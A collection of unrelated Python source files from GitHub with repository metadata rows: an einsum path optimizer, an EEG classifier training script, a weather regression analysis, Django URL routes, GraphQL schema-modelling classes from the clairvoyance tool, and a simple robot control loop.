# shift by cmin for numerical reasons
energies = [math.exp(-(c - cmin) / temperature) for c in costs]
# randomly choose a contraction based on energies
(chosen,) = random_choices(range(n), weights=energies)
cost, k1, k2, k12 = choices.pop(chosen)
# put the other choice back in the heap
for other in choices:
heapq.heappush(queue, other)
return cost, k1, k2, k12
def ssa_path_compute_cost(
ssa_path: PathType,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
) -> Tuple[int, int]:
"""Compute the flops and max size of an ssa path.

Returns a tuple ``(total_cost, max_size)`` where ``total_cost`` is the
summed flop count of every pairwise contraction and ``max_size`` is the
largest intermediate produced along the way.
"""
inputs = list(map(frozenset, inputs)) # type: ignore
output = frozenset(output)
remaining = set(range(len(inputs)))
total_cost = 0
max_size = 0
for i, j in ssa_path:
k12, flops12 = paths.calc_k12_flops(inputs, output, remaining, i, j, size_dict) # type: ignore
# ssa ids are never reused: the new intermediate gets id len(inputs)
remaining.discard(i)
remaining.discard(j)
remaining.add(len(inputs))
inputs.append(k12)
total_cost += flops12
max_size = max(max_size, helpers.compute_size_by_dict(k12, size_dict))
return total_cost, max_size
def _trial_greedy_ssa_path_and_cost(
r: int,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
choose_fn: Any,
cost_fn: Any,
) -> Tuple[PathType, int, int]:
"""A single, repeatable, greedy trial run. **Returns:** ``ssa_path`` and cost."""
if r == 0:
# always start with the standard greedy approach
choose_fn = None
# seeding with the trial number makes each trial deterministic/repeatable
random_seed(r)
ssa_path = paths.ssa_greedy_optimize(inputs, output, size_dict, choose_fn, cost_fn)
cost, size = ssa_path_compute_cost(ssa_path, inputs, output, size_dict)
return ssa_path, cost, size
class RandomGreedy(RandomOptimizer):
"""
**Parameters:**
- **cost_fn** - *(callable, optional)* A function that returns a heuristic 'cost' of a potential contraction
with which to sort candidates. Should have signature
`cost_fn(size12, size1, size2, k12, k1, k2)`.
- **temperature** - *(float, optional)* When choosing a possible contraction, its relative probability will be
proportional to `exp(-cost / temperature)`. Thus the larger
`temperature` is, the further random paths will stray from the normal
'greedy' path. Conversely, if set to zero, only paths with exactly the
same cost as the best at each step will be explored.
- **rel_temperature** - *(bool, optional)* Whether to normalize the ``temperature`` at each step to the scale of
the best cost. This is generally beneficial as the magnitude of costs
can vary significantly throughout a contraction. If False, the
algorithm will end up branching when the absolute cost is low, but
stick to the 'greedy' path when the cost is high - this can also be
beneficial.
- **nbranch** - *(int, optional)* How many potential paths to calculate probability for and choose from at each step.
- **kwargs** - Supplied to RandomOptimizer.
"""
def __init__(
self,
cost_fn: str = "memory-removed-jitter",
temperature: float = 1.0,
rel_temperature: bool = True,
nbranch: int = 8,
**kwargs: Any,
):
self.cost_fn = cost_fn
self.temperature = temperature
self.rel_temperature = rel_temperature
self.nbranch = nbranch
super().__init__(**kwargs)
@property
def choose_fn(self) -> Any:
"""The function that chooses which contraction to take - make this a
property so that ``temperature`` and ``nbranch`` etc. can be updated
between runs.
"""
# with a single branch there is nothing to sample - fall back to greedy
if self.nbranch == 1:
return None
return functools.partial(
thermal_chooser,
temperature=self.temperature,
nbranch=self.nbranch,
rel_temperature=self.rel_temperature,
)
def setup(
self,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
) -> Tuple[Any, Any]:
# trial function + its fixed arguments, consumed by RandomOptimizer.__call__
fn = _trial_greedy_ssa_path_and_cost
args = (inputs, output, size_dict, self.choose_fn, self.cost_fn)
return fn, args
def random_greedy(
inputs: List[ArrayIndexType],
output: ArrayIndexType,
idx_dict: Dict[str, int],
memory_limit: Optional[int] = None,
**optimizer_kwargs: Any,
) -> PathType:
"""Find a contraction path with a one-shot `RandomGreedy` optimizer.

Convenience wrapper: builds a `RandomGreedy` from `optimizer_kwargs`
and returns the best path it finds.  (Annotation fixed: the function
returns a contraction path, not an array.)
"""
optimizer = RandomGreedy(**optimizer_kwargs)
return optimizer(inputs, output, idx_dict, memory_limit)
# pre-configured variant that runs 128 random-greedy repeats
random_greedy_128 = functools.partial(random_greedy, max_repeats=128)
| dgasmith/opt_einsum | opt_einsum/path_random.py | path_random.py | py | 14,478 | python | en | code | 764 | github-code | 36 | [
{
"api_name": "typing.Optional",
"line_number": 72,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 89,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 90,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_numbe... |
4872107449 | import pyriemann
import mne
from mne.io import read_raw_gdf
import scipy
from scipy import signal
from scipy.signal import butter, filtfilt, sosfiltfilt
import os
import pickle
import sklearn
import seaborn as sns
import matplotlib
import matplotlib as mpl
mpl.use('Qt5Agg') # for using pyplot (pip install pyqt5)
import matplotlib.pyplot as plt
import numpy as np
# Bandpass filtering
def butter_lowpass_filter(data, lowcut, fs, order):
    """Zero-phase Butterworth low-pass filter along the time axis.

    data : 2-D array [channels x time]; each channel is demeaned before
    filtering.  Returns the filtered array.
    """
    normalized_cut = lowcut / (fs / 2)
    b, a = butter(order, normalized_cut, btype='low')
    # remove the per-channel mean before filtering
    demeaned = data - np.mean(data, axis=1)[:, np.newaxis]
    return filtfilt(b, a, demeaned)
def butter_highpass_filter(data, highcut, fs, order):
    """Zero-phase Butterworth high-pass filter along the time axis.

    data : 2-D array [channels x time]; each channel is demeaned before
    filtering.  Returns the filtered array.
    """
    normalized_cut = highcut / (fs / 2)
    b, a = butter(order, normalized_cut, btype='high')
    # remove the per-channel mean before filtering
    demeaned = data - np.mean(data, axis=1)[:, np.newaxis]
    return filtfilt(b, a, demeaned)
def butter_bandpass_filter(data, lowcut, highcut, fs, order):
    """Zero-phase Butterworth band-pass filter (SOS form) along the time axis.

    data : 2-D array [channels x time]; each channel is demeaned before
    filtering.  Uses second-order sections for numerical stability and
    sosfiltfilt for zero-phase (forward-backward) filtering.
    Returns the filtered array.
    """
    nyquist = fs / 2
    sos = butter(order, [lowcut / nyquist, highcut / nyquist], btype='band', output='sos')
    # remove the per-channel mean before filtering
    demeaned = data - np.mean(data, axis=1)[:, np.newaxis]
    return sosfiltfilt(sos, demeaned)
# User parameters
# 769, 770, 774, 780 - left, right, up (tongue), down (feet)
#markers = [769, 770, 780, 774]
#markers_arr = {769:0, 770:1, 780:2, 774:3}
markers = [769, 770] # left, right
markers_arr = {769:1, 770:2}
# for g.tec EEG
nCh = 16
fs = 512
# epoch window in seconds relative to each event onset
frame = [0.5, 3]
nTime = int((frame[1]-frame[0]) * 512)
#nTrial = 20
nClass = len(markers)
# band-pass edges in Hz (mu + beta bands)
bp = [8, 30]
ch_names = ['FP1', 'FP2', 'F4', 'Fz', 'F3', 'T7', 'C3', 'Cz', 'C4', 'T8', 'P4', 'Pz', 'P3', 'O1', 'Oz', 'O2']
roi = ['F4', 'Fz', 'F3', 'C3', 'Cz', 'C4', 'P4', 'Pz', 'P3']
# map ROI channel names to their indices in ch_names
roi_id = np.zeros((len(roi)), dtype=np.int64)
for i in range(len(roi)):
roi_id[i] = ch_names.index(roi[i]) # use roi_id
nSub = 3
# accumulate epochs as [trial x ch x time] and their class labels
train_EEG = np.array([]).reshape(0, nCh, nTime)
train_labels = []
for i in range(4):
fname = './data/s%02d/MI_run%02d.gdf' % (nSub, (i+1))
print(fname)
eeg = read_raw_gdf(fname)
ano_types = eeg.annotations.description.astype(int) # markers
ano_latency = np.round(eeg.annotations.onset, 4)
eeg_times = np.round(eeg.times, 4)
# convert to microvolts
dat = eeg.get_data() * 1000000
ch_names = eeg.ch_names
merge_EEG = np.array([]).reshape(nCh, nTime, 0)
for cur_markers in markers:
event_indicies = np.argwhere(ano_types == cur_markers)
event_latencies = ano_latency[event_indicies]
print('current marker is '+str(cur_markers))
n_trial = 0
epoched_EEG = np.array([]).reshape(nCh, nTime, 0)
tmp_labels = markers_arr[cur_markers] * np.ones((len(event_latencies)))
train_labels = np.append(train_labels, tmp_labels)
for cur_latency in event_latencies:
# sample index of the event onset
m_onset = np.where(eeg_times == cur_latency)[0][0]
tmp_epoch = dat[:, m_onset + int(frame[0]*fs):m_onset + int(frame[1]*fs)]
# epoch-level bandpass filtering
tmp_epoch = butter_bandpass_filter(tmp_epoch, bp[0], bp[1], fs, 4)
epoched_EEG = np.dstack((epoched_EEG, tmp_epoch))
n_trial = n_trial + 1
merge_EEG = np.dstack((merge_EEG, epoched_EEG))
merge_EEG = np.transpose(merge_EEG, (2, 0, 1)) # now [trial x ch x time]
train_EEG = np.vstack((train_EEG, merge_EEG))
# covariance matrices over ROI channels, then Riemannian MDM classifier
cov_train = pyriemann.estimation.Covariances().fit_transform(train_EEG[:, roi_id, :])
print(cov_train.shape)
print(train_labels.shape)
mdm = pyriemann.classification.MDM()
mdm.metric = 'Riemann'
mdm.fit(cov_train, train_labels) # training
mdm_train_acc = np.sum(mdm.predict(cov_train) == train_labels) / len(train_labels) # train - meaningless
print('training accuracy is', np.round(mdm_train_acc,4))
# persist the training covariances and labels for later online use
trained = {'COV':cov_train, 'Labels':train_labels}
fname_user = input('Enter model name: ')
fname_model = './data/s%02d/%s.pkl' % (nSub, fname_user)
print(fname_model, 'saved.')
out_file = open(fname_model, 'wb')
pickle.dump(trained, out_file)
out_file.close()
| Kyungho-Won/PyRiemann-with-OpenViBE | train_MI_Riemann.py | train_MI_Riemann.py | py | 4,441 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "scipy.signal.butter",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.newaxis",
"li... |
34301681133 |
import matplotlib
matplotlib.use('TKAgg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from dateutil import parser
import numpy as np
import pandas as pd
import datetime
df_ferrara = pd.read_csv('WeatherData/ferrara_270615.csv')
df_milano = pd.read_csv('WeatherData/milano_270615.csv')
df_mantova = pd.read_csv('WeatherData/mantova_270615.csv')
df_ravenna = pd.read_csv('WeatherData/ravenna_270615.csv')
df_torino = pd.read_csv('WeatherData/torino_270615.csv')
df_asti = pd.read_csv('WeatherData/asti_270615.csv')
df_bologna = pd.read_csv('WeatherData/bologna_270615.csv')
df_piacenza = pd.read_csv('WeatherData/piacenza_270615.csv')
df_cesena = pd.read_csv('WeatherData/cesena_270615.csv')
df_faenza = pd.read_csv('WeatherData/faenza_270615.csv')
# dist 是一个装城市距离海边距离的列表
dist = [df_ravenna['dist'][0],
df_cesena['dist'][0],
df_faenza['dist'][0],
df_ferrara['dist'][0],
df_bologna['dist'][0],
df_mantova['dist'][0],
df_piacenza['dist'][0],
df_milano['dist'][0],
df_asti['dist'][0],
df_torino['dist'][0]
]
# temp_max 是一个存放每个城市最高温度的列表
temp_max = [df_ravenna['temp'].max(),
df_cesena['temp'].max(),
df_faenza['temp'].max(),
df_ferrara['temp'].max(),
df_bologna['temp'].max(),
df_mantova['temp'].max(),
df_piacenza['temp'].max(),
df_milano['temp'].max(),
df_asti['temp'].max(),
df_torino['temp'].max()
]
# temp_min 是一个存放每个城市最低温度的列表
temp_min = [df_ravenna['temp'].min(),
df_cesena['temp'].min(),
df_faenza['temp'].min(),
df_ferrara['temp'].min(),
df_bologna['temp'].min(),
df_mantova['temp'].min(),
df_piacenza['temp'].min(),
df_milano['temp'].min(),
df_asti['temp'].min(),
df_torino['temp'].min()
]
# 调用 subplots() 函数,重新定义 fig, ax 变量
fig, ax = plt.subplots()
plt.xticks(rotation=70)
hours = mdates.DateFormatter('%H:%M')
ax.xaxis.set_major_formatter(hours)
# 先把最高温画出来。
fig, ax = plt.subplots()
ax.plot(dist,temp_max,'ro')
# 用线性回归算法得到两条直线,分别表示两种不同的气温趋势,这样做很有趣。我们可以使用scikit-learn库的SVR方法。
from sklearn.svm import SVR
# dist1是靠近海的城市集合,dist2是远离海洋的城市集合
dist1 = dist[0:5]
dist2 = dist[5:10]
# 改变列表的结构,dist1现在是5个列表的集合
# 之后我们会看到 numpy 中 reshape() 函数也有同样的作用
dist1 = [[x] for x in dist1]
dist2 = [[x] for x in dist2]
# temp_max1 是 dist1 中城市的对应最高温度
temp_max1 = temp_max[0:5]
# temp_max2 是 dist2 中城市的对应最高温度
temp_max2 = temp_max[5:10]
# 我们调用SVR函数,在参数中规定了使用线性的拟合函数
# 并且把 C 设为1000来尽量拟合数据(因为不需要精确预测不用担心过拟合)
svr_lin1 = SVR(kernel='linear', C=1e3)
svr_lin2 = SVR(kernel='linear', C=1e3)
# 加入数据,进行拟合(这一步可能会跑很久,大概10多分钟,休息一下:) )
svr_lin1.fit(dist1, temp_max1)
svr_lin2.fit(dist2, temp_max2)
# 关于 reshape 函数请看代码后面的详细讨论
xp1 = np.arange(10,100,10).reshape((9,1))
xp2 = np.arange(50,400,50).reshape((7,1))
yp1 = svr_lin1.predict(xp1)
yp2 = svr_lin2.predict(xp2)
# ax = fig.add_subplot(122)
# 限制了 x 轴的取值范围
ax.set_xlim(0,400)
# 画出图像
ax.plot(xp1, yp1, c='b', label='Strong sea effect')
ax.plot(xp2, yp2, c='g', label='Light sea effect')
print(svr_lin1.coef_) #斜率
print(svr_lin1.intercept_) # 截距
print(svr_lin2.coef_)
print(svr_lin2.intercept_)
# 你可能会考虑将这两条直线的交点作为受海洋影响和不受海洋影响的区域的分界点,或者至少是海洋影响较弱的分界点。
from scipy.optimize import fsolve
# Defines the first fitted line (cities close to the sea).
def line1(x):
    """Evaluate the first SVR-fitted line at x (slope * x + intercept)."""
    a1 = svr_lin1.coef_[0][0]
    b1 = svr_lin1.intercept_[0]
    return a1*x + b1
# Defines the second fitted line (cities far from the sea).
def line2(x):
    """Evaluate the second SVR-fitted line at x (slope * x + intercept)."""
    a2 = svr_lin2.coef_[0][0]
    b2 = svr_lin2.intercept_[0]
    return a2*x + b2
# Finds the x coordinate where two curves intersect.
def findIntersection(fun1, fun2, x0):
    """Return the x value (as an fsolve result array) where fun1(x) == fun2(x),
    starting the search from the initial guess x0."""
    def difference(x):
        return fun1(x) - fun2(x)
    return fsolve(difference, x0)
# x coordinate of the intersection and the temperature at that point.
# NOTE(review): passing the fsolve result array straight to %d relies on
# implicit single-element-array conversion (deprecated in newer numpy) --
# consider result[0].
result = findIntersection(line1,line2,0.0)
print("[x,y] = [ %d , %d ]" % (result,line1(result)))
# Mark the intersection with a yellow square and show the figure.
ax.plot(result, line1(result), 'ys')
fig.show()
| eternity-phoenix/Private | 气象数据分析/气象线性分析.py | 气象线性分析.py | py | 4,432 | python | zh | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"... |
11538129042 | """
Sandbox URL Configuration
"""
from django.conf import settings
from django.conf.urls import url
from django.views.generic.base import TemplateView

from sandbox.views import BasicSampleFormView, ModesSampleFormView

# NOTE(review): django.conf.urls.url() is deprecated since Django 2.0 and was
# removed in Django 4.0 -- migrate to django.urls.re_path() when upgrading.
# NOTE(review): 'settings' is imported above but unused in this module.
urlpatterns = [
    # Dummy homepage to list demo views
    url(r'^$', TemplateView.as_view(
        template_name="homepage.html"
    ), name='home'),

    # Sample with codemirror in the raw way
    url(r'^raw/$', TemplateView.as_view(
        template_name="raw.html"
    ), name='raw'),

    # Basic form sample
    url(r'^form/$', BasicSampleFormView.as_view(
        template_name="form.html"
    ), name='form'),

    # Mode index list
    url(r'^modes/$', ModesSampleFormView.as_view(
        template_name="modes.html"
    ), name='mode-index'),

    # Basic form sample with specific mode
    url(r'^modes/(?P<mode>[-\w]+)/$', ModesSampleFormView.as_view(
        template_name="modes.html"
    ), name='basic'),
]
| sveetch/djangocodemirror | sandbox/urls.py | urls.py | py | 947 | python | en | code | 31 | github-code | 36 | [
{
"api_name": "django.conf.urls.url",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "django.views.generic.base.TemplateView.as_view",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "django.views.generic.base.TemplateView",
"line_number": 14,
"usage_ty... |
40126491559 | import json
from typing import Any, Dict, List, Optional, Set
from clairvoyance.entities import GraphQLPrimitive
from clairvoyance.entities.context import log
from clairvoyance.entities.primitives import GraphQLKind
class Schema:
    """Host of the introspection data."""

    def __init__(
        self,
        query_type: Optional[str] = None,
        mutation_type: Optional[str] = None,
        subscription_type: Optional[str] = None,
        schema: Optional[Dict[str, Any]] = None,
    ):
        # Two construction modes: parse a full introspection response, or
        # build an empty skeleton seeded with the root operation type names.
        if schema:
            self._schema = {
                'directives': schema['data']['__schema']['directives'],
                'mutationType': schema['data']['__schema']['mutationType'],
                'queryType': schema['data']['__schema']['queryType'],
                'subscriptionType': schema['data']['__schema']['subscriptionType'],
                'types': [],
            }
            self.types = {}
            for t in schema['data']['__schema']['types']:
                typ = Type.from_json(t)
                self.types[typ.name] = typ
        else:
            self.query_type = {'name': query_type} if query_type else None
            self.mutation_type = {'name': mutation_type} if mutation_type else None
            self.subscription_type = ({'name': subscription_type} if subscription_type else None)
            self._schema = {
                'directives': [],
                'queryType': self.query_type,
                'mutationType': self.mutation_type,
                'subscriptionType': self.subscription_type,
                'types': [],
            }
            # Seed the type registry with the built-in scalars.
            self.types = {
                GraphQLPrimitive.STRING: Type(
                    name=GraphQLPrimitive.STRING,
                    kind=GraphQLKind.SCALAR,
                ),
                GraphQLPrimitive.ID: Type(
                    name=GraphQLPrimitive.ID,
                    kind=GraphQLKind.SCALAR,
                ),
            }
            if query_type:
                self.add_type(query_type, 'OBJECT')
            if mutation_type:
                self.add_type(mutation_type, 'OBJECT')
            if subscription_type:
                self.add_type(subscription_type, 'OBJECT')

    # Adds a type to the schema unless it already exists.
    def add_type(
        self,
        name: str,
        kind: str,
    ) -> None:
        """Adds type to schema if it does not exist already."""
        if name not in self.types:
            typ = Type(name=name, kind=kind)
            self.types[name] = typ

    def __repr__(self) -> str:
        """String representation of the schema (introspection-style JSON).

        NOTE(review): 'schema' below aliases self._schema, so the append loop
        mutates the shared self._schema['types'] list -- repeated calls will
        accumulate duplicate entries.  Verify intended.
        """
        schema = {'data': {'__schema': self._schema}}
        for t in self.types.values():
            schema['data']['__schema']['types'].append(t.to_json())
        output = json.dumps(schema, indent=4, sort_keys=True)
        return output

    def get_path_from_root(
        self,
        name: str,
    ) -> List[str]:
        """Getting path starting from root.

        The algorithm explores the schema in a DFS manner. It uses a set to keep track of visited nodes, and a list to keep track of the path. Keeping track of
        the visited nodes is necessary to avoid infinite loops (ie. recursions in the schema). If a full iteration over the types is made without finding a
        match, it means that the schema is not connected, and the path cannot be found.
        """
        log().debug(f'Entered get_path_from_root({name})')
        path_from_root: List[str] = []
        if name not in self.types:
            raise Exception(f'Type \'{name}\' not in schema!')
        # Root operation type names ('' placeholders filtered out below).
        roots = [
            self._schema['queryType']['name'] if self._schema['queryType'] else '',
            self._schema['mutationType']['name'] if self._schema['mutationType'] else '',
            self._schema['subscriptionType']['name'] if self._schema['subscriptionType'] else '',
        ]
        roots = [r for r in roots if r]
        visited = set()
        initial_name = name
        # Walk backwards: find a field whose type is `name`, step up to the
        # field's parent type, repeat until a root operation type is reached.
        while name not in roots:
            found = False
            for t in self.types.values():
                for f in t.fields:
                    key = f'{t.name}.{f.name}'
                    if key in visited:
                        continue
                    if f.type.name == name:
                        path_from_root.insert(0, f.name)
                        visited.add(key)
                        name = t.name
                        found = True
            # NOTE(review): the loops above do not break after the first
            # match, so several field names may be prepended in one pass --
            # confirm this is intended.
            if not found:
                log().debug('get_path_from_root: Ran an iteration with no matches found')
                raise Exception(f'Could not find path from root to \'{initial_name}\' \nCurrent path: {path_from_root}')
        # Prepend queryType or mutationType
        path_from_root.insert(0, name)
        return path_from_root

    def get_type_without_fields(
        self,
        ignored: Optional[Set[str]] = None,
    ) -> str:
        """Return the name of a non-input type that has no fields yet,
        skipping names in *ignored*; '' when every such type has fields."""
        ignored = ignored or set()
        for t in self.types.values():
            if not t.fields and t.name not in ignored and t.kind != GraphQLKind.INPUT_OBJECT:
                return t.name
        return ''

    def convert_path_to_document(
        self,
        path: List[str],
    ) -> str:
        """Convert a root-first path of field names into a GraphQL document
        with a 'FUZZ' placeholder at the innermost selection."""
        log().debug(f'Entered convert_path_to_document({path})')
        doc = 'FUZZ'
        # Wrap from the innermost field outwards; path[0] remains the root.
        while len(path) > 1:
            doc = f'{path.pop()} {{ {doc} }}'
        if self._schema['queryType'] and path[0] == self._schema['queryType']['name']:
            doc = f'query {{ {doc} }}'
        elif self._schema['mutationType'] and path[0] == self._schema['mutationType']['name']:
            doc = f'mutation {{ {doc} }}'
        elif self._schema['subscriptionType'] and path[0] == self._schema['subscriptionType']['name']:
            doc = f'subscription {{ {doc} }}'
        else:
            raise Exception('Unknown operation type')
        return doc
class TypeRef:
    """Reference to a GraphQL type, including LIST / NON_NULL wrapping."""

    def __init__(
        self,
        name: str,
        kind: str,
        is_list: bool = False,
        non_null_item: bool = False,
        non_null: bool = False,
    ) -> None:
        # A NON_NULL wrapper on the items only makes sense inside a LIST.
        if non_null_item and not is_list:
            raise Exception('elements can\'t be NON_NULL if TypeRef is not LIST')
        self.name = name
        self.kind = kind
        self.is_list = is_list
        self.non_null = non_null
        self.list = self.is_list
        self.non_null_item = non_null_item

    def __eq__(self, other: Any) -> bool:
        if not isinstance(other, TypeRef):
            return False
        return all(other.__dict__[key] == attr for key, attr in self.__dict__.items())

    def __str__(self) -> str:
        return str(self.__dict__)

    def to_json(self) -> Dict[str, Any]:
        """Serialize to introspection JSON, applying wrappers innermost-out:
        [T!]! becomes NON_NULL(LIST(NON_NULL(T)))."""
        wrapped: Dict[str, Any] = {'kind': self.kind, 'name': self.name, 'ofType': None}
        if self.non_null_item:
            wrapped = {'kind': GraphQLKind.NON_NULL, 'name': None, 'ofType': wrapped}
        if self.list:
            wrapped = {'kind': GraphQLKind.LIST, 'name': None, 'ofType': wrapped}
        if self.non_null:
            wrapped = {'kind': GraphQLKind.NON_NULL, 'name': None, 'ofType': wrapped}
        return wrapped
class InputValue:
    """A named GraphQL input value (argument) and its type reference."""

    def __init__(self, name: str, typ: 'TypeRef') -> None:
        self.name = name
        self.type = typ

    def __str__(self) -> str:
        return f'{{ \'name\': {self.name}, \'type\': {str(self.type)} }}'

    def to_json(self) -> dict:
        """Serialize to introspection JSON (defaultValue/description unused)."""
        return {
            'defaultValue': None,
            'description': None,
            'name': self.name,
            'type': self.type.to_json(),
        }

    @classmethod
    def from_json(cls, _json: Dict[str, Any]) -> 'InputValue':
        """Build an InputValue from its introspection JSON."""
        return cls(
            name=_json['name'],
            typ=field_or_arg_type_from_json(_json['type']),
        )
def field_or_arg_type_from_json(_json: Dict[str, Any]) -> 'TypeRef':
    """Build a TypeRef from an introspection field/arg type JSON.

    The nesting depth of 'ofType' encodes the wrappers:
    depth 0 -> T; depth 1 -> T! or [T]; depth 2 -> [T]! or [T!];
    depth 3 -> [T!]!.  Deeper nesting is rejected.
    """
    typ = None
    if _json['kind'] not in [GraphQLKind.NON_NULL, GraphQLKind.LIST]:
        # Bare named type: no wrappers at all.
        typ = TypeRef(
            name=_json['name'],
            kind=_json['kind'],
        )
    elif not _json['ofType']['ofType']:
        # Exactly one wrapper around the named type: T! or [T].
        actual_type = _json['ofType']
        if _json['kind'] == GraphQLKind.NON_NULL:
            typ = TypeRef(
                name=actual_type['name'],
                kind=actual_type['kind'],
                non_null=True,
            )
        elif _json['kind'] == GraphQLKind.LIST:
            typ = TypeRef(
                name=actual_type['name'],
                kind=actual_type['kind'],
                is_list=True,
            )
        else:
            raise Exception(f'Unexpected type.kind: {_json["kind"]}')
    elif not _json['ofType']['ofType']['ofType']:
        # Two wrappers: [T]! (NON_NULL outer) or [T!] (LIST outer).
        actual_type = _json['ofType']['ofType']
        if _json['kind'] == GraphQLKind.NON_NULL:
            # Positional args map to
            # (name, kind, is_list=True, non_null_item=False, non_null=True).
            typ = TypeRef(
                actual_type['name'],
                actual_type['kind'],
                True,
                False,
                True,
            )
        elif _json['kind'] == GraphQLKind.LIST:
            typ = TypeRef(
                name=actual_type['name'],
                kind=actual_type['kind'],
                is_list=True,
                non_null_item=True,
            )
        else:
            raise Exception(f'Unexpected type.kind: {_json["kind"]}')
    elif not _json['ofType']['ofType']['ofType']['ofType']:
        # Three wrappers: the fully wrapped [T!]! case.
        actual_type = _json['ofType']['ofType']['ofType']
        typ = TypeRef(
            name=actual_type['name'],
            kind=actual_type['kind'],
            is_list=True,
            non_null_item=True,
            non_null=True,
        )
    else:
        raise Exception('Invalid field or arg (too many \'ofType\')')
    return typ
class Field:
    """A GraphQL field: a name, a type reference and optional arguments."""

    def __init__(
        self,
        name: str,
        typeref: 'Optional[TypeRef]',
        args: 'List[InputValue]' = None,
    ):
        # A field without a resolvable type reference is unusable.
        if not typeref:
            raise Exception(f'Can\'t create {name} Field from {typeref} TypeRef.')
        self.name = name
        self.type = typeref
        self.args = args or []

    def to_json(self) -> dict:
        """Serialize to introspection JSON (never deprecated, no description)."""
        return {
            'args': [arg.to_json() for arg in self.args],
            'deprecationReason': None,
            'description': None,
            'isDeprecated': False,
            'name': self.name,
            'type': self.type.to_json(),
        }

    @classmethod
    def from_json(cls, _json: Dict[str, Any]) -> 'Field':
        """Build a Field (and its arguments) from introspection JSON."""
        parsed_args = [InputValue.from_json(arg) for arg in _json['args']]
        return cls(_json['name'], field_or_arg_type_from_json(_json['type']), parsed_args)
class Type:
    """A named GraphQL type and its (input) fields."""

    def __init__(
        self,
        name: str = '',
        kind: str = '',
        fields: Optional[List[Field]] = None,
    ):
        self.name = name
        self.kind = kind
        self.fields: List[Field] = fields or []

    def to_json(self) -> Dict[str, Any]:
        # dirty hack: a type with no fields is invalid GraphQL, so emit a
        # placeholder 'dummy' String field (filtered back out in from_json).
        if not self.fields:
            field_typeref = TypeRef(
                name=GraphQLPrimitive.STRING,
                kind=GraphQLKind.SCALAR,
            )
            dummy = Field('dummy', field_typeref)
            self.fields.append(dummy)
        output: Dict[str, Any] = {
            'description': None,
            'enumValues': None,
            'interfaces': [],
            'kind': self.kind,
            'name': self.name,
            'possibleTypes': None,
        }
        # OBJECT/INTERFACE expose 'fields'; INPUT_OBJECT exposes 'inputFields'.
        if self.kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE]:
            output['fields'] = [f.to_json() for f in self.fields]
            output['inputFields'] = None
        elif self.kind == GraphQLKind.INPUT_OBJECT:
            output['fields'] = None
            output['inputFields'] = [f.to_json() for f in self.fields]
        return output

    @classmethod
    def from_json(
        cls,
        _json: Dict[str, Any],
    ) -> 'Type':
        """Build a Type from introspection JSON, dropping 'dummy' fields."""
        name = _json['name']
        kind = _json['kind']
        fields = []
        if kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE, GraphQLKind.INPUT_OBJECT]:
            fields_field = ''
            if kind in [GraphQLKind.OBJECT, GraphQLKind.INTERFACE]:
                fields_field = 'fields'
            elif kind == GraphQLKind.INPUT_OBJECT:
                fields_field = 'inputFields'
            for f in _json[fields_field]:
                # Don't add dummy fields!
                if f['name'] == 'dummy':
                    continue
                fields.append(Field.from_json(f))
        return cls(
            name=name,
            kind=kind,
            fields=fields,
        )
| nikitastupin/clairvoyance | clairvoyance/graphql.py | graphql.py | py | 12,718 | python | en | code | 785 | github-code | 36 | [
{
"api_name": "typing.Dict",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "typing.Any",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "clairvoyance.entities.GraphQLPrimitive.STRING",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_nam... |
6215124822 | from rodi import RoDI
import time
robot = RoDI()
def reubicar():
    """Reposition the robot: stop, flash red, back up, turn left, go forward.

    Used to back away when the line sensor fires (ring edge) or an attack
    has gone on too long.
    """
    robot.move_stop()
    robot.pixel(20,0,0)
    robot.move_backward()
    time.sleep(0.1)
    robot.move_left()
    time.sleep(0.5)
    robot.move_forward()
    time.sleep(0.5)
def ataque():
    """Attack: drive forward at full speed."""
    robot.move(100,100)
# Main control loop: cruise slowly, back off when the line sensor fires,
# attack when an opponent is close, and abort an attack lasting over 2 s.
#
# BUG FIX: the original reset inicio_de_ataque to None on EVERY iteration and
# then unconditionally computed time.time() - inicio_de_ataque, which raised
# TypeError whenever no attack had started in that same pass.  The attack
# start time is now kept across iterations and the timeout is only checked
# while an attack is actually in progress.
inicio_de_ataque = None  # time.time() when the current attack started, or None
while True:
    try:
        distancia = robot.see()
        linea = robot.sense()
        robot.pixel(20,20,20)
        robot.move(30,30)
        time.sleep(0.1)
        print("Distancia: " + str(distancia))
        print("Linea 1: " + str(linea[0]))
        print("Linea 2: " + str(linea[1]))
        # Line sensor triggered: we are at the ring border, back off.
        if (linea[0] >= 100 or linea[1] >= 100):
            reubicar()
        if distancia < 15:
            # Opponent close: attack, remembering when the attack began.
            ataque()
            if inicio_de_ataque is None:
                inicio_de_ataque = time.time()
        else:
            # Target lost: the attack (if any) is over.
            inicio_de_ataque = None
        # Give up on an attack that has been running for more than 2 seconds.
        if inicio_de_ataque is not None and time.time() - inicio_de_ataque > 2:
            reubicar()
            inicio_de_ataque = None
    except KeyboardInterrupt:
        robot.move_stop()
        break
| devpbeat/bootcamp | rob.py | rob.py | py | 921 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "rodi.RoDI",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 12,
"usage_type": "call"
},
{
